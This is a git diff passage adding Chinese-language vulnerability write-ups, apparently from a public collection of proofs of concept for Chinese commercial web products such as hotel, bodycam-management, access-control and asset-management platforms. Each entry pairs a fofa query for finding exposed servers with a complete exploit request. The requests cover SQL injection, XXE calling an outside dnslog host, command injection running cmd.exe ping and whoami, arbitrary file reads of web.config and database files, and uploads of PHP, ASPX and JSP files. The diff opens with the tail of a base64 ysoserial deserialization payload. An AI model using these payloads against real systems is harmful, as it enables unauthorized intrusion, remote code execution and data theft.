ABQAvsATwL8AFEASgAAANQAFQClABEAWwBcAAgA1gALAFsAXAAIAhoAbABdAF4ADwKSAEIAXQBeABACiwBJAF8AYAAPAfAA5gBhAGIADQITAMMAYwBkAA4BJgG3AGUAZgAKAT4BnwBnAGYACwFXAYYAaABmAAwBDwHUAGkAagAJADQCtgBrAGwABQBDAqcAbQBuAAYAcgJ4AG8AZgAHAQwB3gBwAHEACALvAAMAWwByAAUAJwLRAHMAagAEAAIC9gB0AHUAAAAJAu8AdgB3AAEAEwLlAHgAeQACACQC1AB6AHsAAwB8AAAAqAAX/wAnAAUBBwB9BwB+BwAJAQAA/AAUBwB//AAaBwCAAvwAIgcAgWUHAIISXQcAggz9AC0HAIMB/gDLBwCBBwCBBwCBUgcAhP8AmgAPAQcAfQcAfgcACQEHAH8HAIAHAIEHAIMBBwCBBwCBBwCBBwCEBwA9AAEHAIX7AEr5AAH4AAb6AAX/AAYABQEHAH0HAH4HAAkBAABCBwCGBP8ABQAAAABCBwCGAAABAIcAAAACAIh1cQB+ABAAAAHUyv66vgAAADMAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAyQAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJcHQACFdUUFRBQ0hZcHcBAHhxAH4ADXg=)}}
+```
+
+![1711819619027-a00a9ef4-4d79-4866-8f12-ffe12fd1560e.png](./img/zWTMpvX2S5KgVWD4/1711819619027-a00a9ef4-4d79-4866-8f12-ffe12fd1560e-452415.png)
+
+[xiruanyun-FoxLookupInvoker-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713623246705-9591bb8e-2a1c-46c7-8adc-8448de2e0d9b.yaml)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hovuc44zuuowa3gd>
\ No newline at end of file
diff --git a/西软云XMSoperate接口存在XXE漏洞.md b/西软云XMSoperate接口存在XXE漏洞.md
new file mode 100644
index 0000000..454850f
--- /dev/null
+++ b/西软云XMSoperate接口存在XXE漏洞.md
@@ -0,0 +1,33 @@
+# 西软云XMS operate接口存在XXE漏洞
+
+# 一、漏洞简介
+西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四，五星级中高端酒店提供灵活、高度整合酒店业务，助力酒店智能转型升级。2020的开年突变，对酒店行业来讲，无疑是天降横祸。覆巢之下，焉有完卵，对酒店管理系统企业来说，则是增量市场的红利几乎消失，所有品牌都得在存量市场里搏杀，生存和创新，是2020年的头号命题。西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据，使系统处于极不安全状态。
+
+# 二、影响版本
++ 西软云XMS
+
+# 三、资产测绘
++ fofa`app="shiji-西软云XMS"`
++ 特征
+
+![1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8.png](./img/9I5b4qVYQjvHjf2I/1711817597122-2208de63-eaca-439e-a2d3-83213cca9fb8-622096.png)
+
+# 四、漏洞复现
+```plain
+POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
+Content-Length: 79
+Accept-Encoding: gzip, deflate
+Connection: close
+Content-Type: text/xml
+
+<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://q26gls.dnslog.cn"> %remote;]>
+```
+
+![1711817615653-a87b144a-a77e-4cf1-b296-a5ff885a353e.png](./img/9I5b4qVYQjvHjf2I/1711817615653-a87b144a-a77e-4cf1-b296-a5ff885a353e-517502.png)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vt5rnzir8sgdr1pz>
\ No newline at end of file
diff --git a/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md b/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md
new file mode 100644
index 0000000..358650f
--- /dev/null
+++ b/誉龙数字执法记录仪管理平台FindById存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 誉龙数字执法记录仪管理平台 FindById存在SQL注入漏洞
+
+# 一、漏洞简介
+誉龙数字执法记录仪管理平台是深圳誉龙数字技术有限公司开发的执法记录仪管理平台，誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+# 二、影响版本
++ 誉龙数字执法记录仪管理平台
+
+# 三、资产测绘
++ fofa`body="PView 视音频管理平台"`
++ 特征
+
+![1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3.png](./img/VYcOtKaJIFf_m5Yn/1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3-787765.png)
+
+# 四、漏洞复现
+```go
+POST /index.php?r=RelMedia/FindById HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+ 
+id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
+```
+
+![1726620841847-a47e8ed7-a3db-496f-a0d2-b1c430c144b2.png](./img/VYcOtKaJIFf_m5Yn/1726620841847-a47e8ed7-a3db-496f-a0d2-b1c430c144b2-977199.png)
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mnghcs7bfd52x86g>
\ No newline at end of file
diff --git a/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md b/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md
new file mode 100644
index 0000000..849e43f
--- /dev/null
+++ b/誉龙数字执法记录仪管理平台TimeSyn远程命令执行.md
@@ -0,0 +1,34 @@
+# 誉龙数字执法记录仪管理平台 TimeSyn 远程命令执行
+
+# 一、漏洞简介
+誉龙数字执法记录仪管理平台是深圳誉龙数字技术有限公司开发的执法记录仪管理平台，该平台存在远程命令执行漏洞，攻击者可以利用该漏洞执行任意命令，这可能导致对系统进行未经授权的操作，例如创建、修改或删除文件、执行系统命令、安装恶意软件等。
+
+# 二、影响版本
++ 誉龙数字执法记录仪管理平台
+
+# 三、资产测绘
++ fofa`body="PView 视音频管理平台"`
++ 特征
+
+![1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3.png](./img/Z2u3bzlmVxpGXETB/1726295881688-5a934d40-ff14-4e0a-87a0-2dec0b87f3c3-660762.png)
+
+# 四、漏洞复现
+```go
+POST /index.php?r=Third/TimeSyn HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Host: 
+Cookie: JSESSIONID=AB3CC11444E566879F70BE78C0C518CA
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 96
+
+cloudKey=0x0&date=|cmd.exe+/c+ping jzogguorui.dgrh3.cn&time=1
+```
+
+![1726295898690-b6f838cb-5df3-42e7-810e-04a9292c7545.png](./img/Z2u3bzlmVxpGXETB/1726295898690-b6f838cb-5df3-42e7-810e-04a9292c7545-933245.png)
+
+
+
+> 更新: 2024-10-22 09:36:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tory9ats6o7dd65g>
\ No newline at end of file
diff --git a/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md b/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md
new file mode 100644
index 0000000..fca1010
--- /dev/null
+++ b/誉龙视音频综合管理平台FindById存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 誉龙视音频综合管理平台FindById存在SQL注入漏洞
+
+誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞，未经身份验证的远程攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="PView 视音频管理平台"
+```
+
+## poc
+
+```javascript
+POST /index.php?r=RelMedia/FindById HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162102180.png)
+
diff --git a/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md b/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md
new file mode 100644
index 0000000..ecd414a
--- /dev/null
+++ b/誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞.md
@@ -0,0 +1,25 @@
+# 誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞
+
+誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞，未经身份验证的远程攻击者在目标服务器上执行任意系统命令，可能导致服务器被完全控制、数据泄露或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="PView 视音频管理平台"
+```
+
+## poc
+
+```javascript
+POST /index.php?r=Third/TimeSyn HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+cloudKey=0x0&date=|cmd.exe+/c+whoami+>+1.txt&time=1
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162103838.png)
\ No newline at end of file
diff --git a/证书查询系统存在任意文件读取漏洞.md b/证书查询系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..75ded8a
--- /dev/null
+++ b/证书查询系统存在任意文件读取漏洞.md
@@ -0,0 +1,27 @@
+# 证书查询系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+证书查询系统存在任意文件读取漏洞
+
+# 二、影响版本
++ 餐厅数字化综合管理平台
+
+# 三、资产测绘
++ fofa`"/index/js/jquery.uls.data.js'"`
+
+![1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37.png](./img/RJ349Ot7eGo3wrZl/1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37-929281.png)
+
+# 四、漏洞复现
+```java
+GET /index/ajax/lang?lang=../../application/database HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+```
+
+![1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7.png](./img/RJ349Ot7eGo3wrZl/1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7-454699.png)
+
+
+
+> 更新: 2024-08-12 17:15:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kw3y9u4xck897gu2>
\ No newline at end of file
diff --git a/购物商城系统commodtiy存在任意SQL注入漏洞.md b/购物商城系统commodtiy存在任意SQL注入漏洞.md
new file mode 100644
index 0000000..b6375db
--- /dev/null
+++ b/购物商城系统commodtiy存在任意SQL注入漏洞.md
@@ -0,0 +1,25 @@
+## 购物商城系统commodtiy存在任意SQL注入漏洞
+ 购物商城系统commodtiy存在任意SQL注入漏洞
+
+## fofa
+```plain
+"/public/gwc.php"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1715270637996-7f6f5141-b58d-4ecc-af15-6b309fb958a3.png)
+
+## 三、漏洞复现
+```http
+POST /public/commodtiy.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Connection: close
+
+ddxq='||(SELECT 0x4776756d WHERE 3443=3443 AND (SELECT 9303 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'
+```
+
+
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731861954485-5da4b05c-698c-40e1-a7d4-7819586d55df.png)
+
diff --git a/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md b/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md
new file mode 100644
index 0000000..2bcee7b
--- /dev/null
+++ b/费浦门禁出入口安防平台aDKManageUser存在未授权访问.md
@@ -0,0 +1,29 @@
+# 费浦门禁出入口安防平台aDKManageUser存在未授权访问
+
+# 一、漏洞简介
+ADKFP门禁出入口综合安防管理平台，企业出入口系统采用两级运营管理方式，即“集中控制，分散管理”的方式实现企业管理中心和各企业合作运营的管理模式。 企业出入口系统的所有功能，都是以功能模块的形式提供。模块化的好处是能适应用户的需求，系统可任意搭配，互相配合，能够组合式适应用户需要，与用户的管理模式紧密结合。系统覆盖基础平台、身份信息平台、设备管理、门禁管理、考勤管理、访客管理、车辆门禁、电子门锁管理、移动端管理，智能办公模块包含智能迎宾、会议签到、布控抓拍、报警信息推送等多个应用子系统，所有子系统可实现信息共享，统一服务于整个企业出入口平台。 ADKFP门禁出入口综合安防管理平台存在接口未授权访问，可通过访问接口获取系统账号及密码，进而登录系统后台进行下一步渗透。
+
+# 二、影响版本
++ ADKFP门禁出入口综合安防管理平台
+
+# 三、资产测绘
++ fofa`body="/adkfp/getCode"`
++ 特征
+
+![1706857311657-f58b56c0-f770-4251-a2a0-1787c92a822c.png](./img/ktohE5l624w9N9pn/1706857311657-f58b56c0-f770-4251-a2a0-1787c92a822c-140071.png)
+
+# 四、漏洞复现
+```plain
+/aDKManageUser/selectCll_2?roleId=2&page=1&limit=10
+```
+
+![1706857390853-836d88a9-ebf3-4edb-8182-9f83e003069d.png](./img/ktohE5l624w9N9pn/1706857390853-836d88a9-ebf3-4edb-8182-9f83e003069d-704744.png)
+
+使用泄漏的账号密码登陆系统
+
+![1706857658157-491df212-b97a-4a02-bfe1-32ff502f5d00.png](./img/ktohE5l624w9N9pn/1706857658157-491df212-b97a-4a02-bfe1-32ff502f5d00-287209.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ox6ro65l6vgz2hl5>
\ No newline at end of file
diff --git a/资产管理运营系统comfileup前台文件上传漏洞.md b/资产管理运营系统comfileup前台文件上传漏洞.md
new file mode 100644
index 0000000..144b6c3
--- /dev/null
+++ b/资产管理运营系统comfileup前台文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 资产管理运营系统comfileup前台文件上传漏洞
+
+# 一、漏洞简介
+湖南众合百易信息技术有限公司（简称：百易云）成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业，公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型，有效提高公司管理水平及业务办理效率、降低运营成本，公司自成立以来，已帮助众多企业实现数字化转型。资产管理运营系统comfileup前台文件上传漏洞
+
+# 二、影响版本
++ 资产管理运营系统
+
+# 三、资产测绘
++ fofa`body="media/css/uniform.default.css" && body="资管云"`
++ 特征
+
+![1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899.png](./img/Wqde2Cpvw4X5b-Ms/1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899-329885.png)
+
+# 四、漏洞复现
+```plain
+POST /comfileup.php HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: ASP.NET_SessionId=vkp4usonpxcstreczz05g113
+Accept: */*
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Length: 35827
+
+-----------------------------289666258334735365651210512949
+Content-Disposition: form-data; name="file"; filename="1.php"
+Content-Type: image/png
+
+123
+-----------------------------289666258334735365651210512949--
+```
+
+![1721891324618-765acd68-6008-42a7-a922-189de659276e.png](./img/Wqde2Cpvw4X5b-Ms/1721891324618-765acd68-6008-42a7-a922-189de659276e-617875.png)
+
+```plain
+/uploads/202407/0725/20240725-66a1f85ecfb2c.php
+```
+
+![1721891373679-8062bf4f-2c05-47bb-a7df-4ecad4c32900.png](./img/Wqde2Cpvw4X5b-Ms/1721891373679-8062bf4f-2c05-47bb-a7df-4ecad4c32900-079718.png)
+
+
+
+> 更新: 2024-08-12 17:15:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hkdpgnqni0idpkxy>
\ No newline at end of file
diff --git a/资产管理运营系统mobilefront2前台文件上传漏洞.md b/资产管理运营系统mobilefront2前台文件上传漏洞.md
new file mode 100644
index 0000000..b26325b
--- /dev/null
+++ b/资产管理运营系统mobilefront2前台文件上传漏洞.md
@@ -0,0 +1,37 @@
+# 资产管理运营系统mobilefront2前台文件上传漏洞
+湖南众合百易信息技术有限公司（简称：百易云）成立于2017年是一家专注于不动产领域数字化研发及服务的国家高新技术企业，公司拥有不动产领域的数字化全面解决方案、覆盖住宅、写字楼、商业中心、专业市场、产业园区、公建、后勤等多种业态、通过数字化帮助企业实现数字化转型，有效提高公司管理水平及业务办理效率、降低运营成本，公司自成立以来，已帮助众多企业实现数字化转型。资产管理运营系统mobilefront2前台文件上传漏洞
+
+# fofa
+```javascript
+body="media/css/uniform.default.css" && body="资管云"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1721891230963-ab71a358-6ed2-4ca8-9c97-c78fd2421899.png)
+
+## poc
+```java
+POST /mobilefront/c/2.php HTTP/1.1
+Host: 
+Content-Type: multipart/form-data; boundary=---------------------------289666258334735365651210512949
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Length: 35827
+
+-----------------------------289666258334735365651210512949
+Content-Disposition: form-data; name="file1"; filename="1.php"
+Content-Type: image/png
+
+<?php phpinfo();?>
+-----------------------------289666258334735365651210512949--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1725009158273-6ced2659-9820-4f50-bc55-55e18fd6b2d5.png)
+
+```java
+/mobilefront/c/images2/17250090851.php
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/1622799/1725009187757-3a3a5fd4-f025-4ce9-9fa6-1834f403cb61.png)
+
diff --git a/赛思-SuccezBl前台任意文件上传.md b/赛思-SuccezBl前台任意文件上传.md
new file mode 100644
index 0000000..eaee338
--- /dev/null
+++ b/赛思-SuccezBl前台任意文件上传.md
@@ -0,0 +1,28 @@
+## 赛思 SuccezBl前台任意文件上传
+```
+POST /succezbi/sz/commons/form/file/uploadChunkFile?guid=../tomcat/webapps/ROOT/&chunk=ss.jsp HTTP/1.1
+Host: 10.168.4.99:808
+Content-Length: 49564
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: null
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8GeAY18LCxR7XnVP
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8, application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN, zh;q=0.9
+Cookie: JSESSIONID=7351EFC189410384FF702A41106FF4A2
+Connection: close
+
+------WebKitFormBoundary8GeAY18LCxR7XnVP
+Content-Disposition: form-data; name="file"; filename="www"
+Content-Type: image/jpeg
+
+webshell
+
+------WebKitFormBoundary8GeAY18LCxR7XnVP
+Content-Disposition: form-data; name="xxx"
+
+confirm
+------WebKitFormBoundary8GeAY18LCxR7XnVP--
+```
diff --git a/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md b/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md
new file mode 100644
index 0000000..c84573e
--- /dev/null
+++ b/赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# 赛普EAP企业适配管理平台Download.aspx任意文件读取漏洞
+
+赛普EAP企业适配管理平台 Download.aspx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统文件，造成信息泄露。
+
+## fofa
+
+```kotlin
+body="IDWebSoft/"
+```
+
+## poc
+
+```javascript
+GET /IDWebSoft/Common/Handler/Download.aspx?FileName=web.config&FileTitle= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82Safari/537.36
+Content-Type:application/x-www-form-urlencoded
+Accept: */*
+Connection: Keep-Alive
+```
+
+![image-20241101195031794](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011950858.png)
\ No newline at end of file
diff --git a/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md b/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..9d79099
--- /dev/null
+++ b/赛普EAP企业适配管理平台Upload存在任意文件上传漏洞.md
@@ -0,0 +1,36 @@
+# 赛普EAP企业适配管理平台Upload存在任意文件上传漏洞
+赛普EAP企业适配管理平台，是一款专门为房地产企业打造的数字化管理系统，旨在帮助企业实现业务流程的优化、管理效率的提升和客户体验的改善。系统集成了项目管理、销售管理、客户关系管理、财务管理、报表分析等多个模块，能够满足企业不同层级、不同部门的管理需求。通过采用灵活的配置机制，该系统可以根据不同企业的需求进行定制化配置，实现与企业业务的完美契合。赛普EAP企业适配管理平台Upload存在任意文件上传漏洞
+
+## fofa
+```javascript
+body="IDWebSoft/"
+```
+
+## poc
+```java
+POST /IDWebSoft/Common/Handler/Upload.aspx HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: multipart/form-data; boundary=---------------------------328367279028471380642525145085
+Accept: */*
+Content-Length: 44892
+
+-----------------------------328367279028471380642525145085
+Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
+Content-Type: image/png
+
+<% response.write("drwc2nymcirgr7r2bdgb111")%>
+-----------------------------328367279028471380642525145085--
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434585150-3f3a308b-bfc8-477d-9e09-0b93e43169dc.png)
+
+```java
+/IDWebSoft/Accessary/2024/11/cf9ebf1f-04f9-47f7-b2a3-aa22f74cf825.aspx
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731434601172-28e5ec47-8721-41eb-9010-76dce5d3d1a8.png)
+
diff --git a/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md b/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md
new file mode 100644
index 0000000..00a4864
--- /dev/null
+++ b/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 赛诸葛数字化智能中台系统login存在SQL注入漏洞
+
+赛诸葛数字化智能中台系统 login 登录接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="static/index/image/login_left.png" || icon_hash="1056416905"
+```
+
+## poc
+```javascript
+POST /login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+username=1')) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(3469=3469,version()))),0x7e),3469) AND (('fOfY'='fOfY&loginType=1&password=bbb8aae57c104cda40c93843ad5e6db8&phone_head=86&wx_openid=&member=
+```
+
+![image-20241227221000969](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272210041.png)
\ No newline at end of file
diff --git a/超易企业管理系统Login.ashx存在SQL注入漏洞.md b/超易企业管理系统Login.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..a4ead40
--- /dev/null
+++ b/超易企业管理系统Login.ashx存在SQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 超易企业管理系统Login.ashx存在SQL注入漏洞
+
+超易企业管理系统存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+## fofa
+
+```yaml
+"超易企业管理系统"
+```
+
+## poc
+
+```java
+POST /ajax/Login.ashx?Date=%271721821198459%27 HTTP/1.1
+Host: 
+Content-Length: 92
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+username=admin*&password=admin123&loginguid=&logintype=pc
+```
+
diff --git a/辰信景云终端安全管理系统login存在SQL注入漏洞.md b/辰信景云终端安全管理系统login存在SQL注入漏洞.md
new file mode 100644
index 0000000..7483b1c
--- /dev/null
+++ b/辰信景云终端安全管理系统login存在SQL注入漏洞.md
@@ -0,0 +1,32 @@
+# 辰信景云终端安全管理系统 login 存在SQL注入漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(34, 34, 34);">辰信景云终端安全管理系统是辰信领创推出的新一代企业级反病毒安全防护软件， 为企业提供了一套专业可信赖的全方位终端安全解决方案。辰信景云终端安全管理系统 login 存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。</font>
+
+# <font style="color:rgb(34, 34, 34);">二、影响版本</font>
++ <font style="color:rgb(34, 34, 34);">辰信景云终端安全管理系统</font>
+
+# <font style="color:rgb(34, 34, 34);">三、资产测绘</font>
++ fofa`app="辰信领创-景云终端安全管理系统"`
++ 特征
+
+![1706789257491-27df1e43-1efc-4ccb-8a8b-692fe60abd18.png](./img/EJ0iaJQbi88AjXxC/1706789257491-27df1e43-1efc-4ccb-8a8b-692fe60abd18-530366.png)
+
+# 四、漏洞复习
+```plain
+POST /api/user/login HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 102
+
+captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(5))a)='
+```
+
+![1706789300903-7f48eaf9-74bd-4d2f-97ee-dda7b81223fd.png](./img/EJ0iaJQbi88AjXxC/1706789300903-7f48eaf9-74bd-4d2f-97ee-dda7b81223fd-737141.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mdnxgki42lxoaomn>
\ No newline at end of file
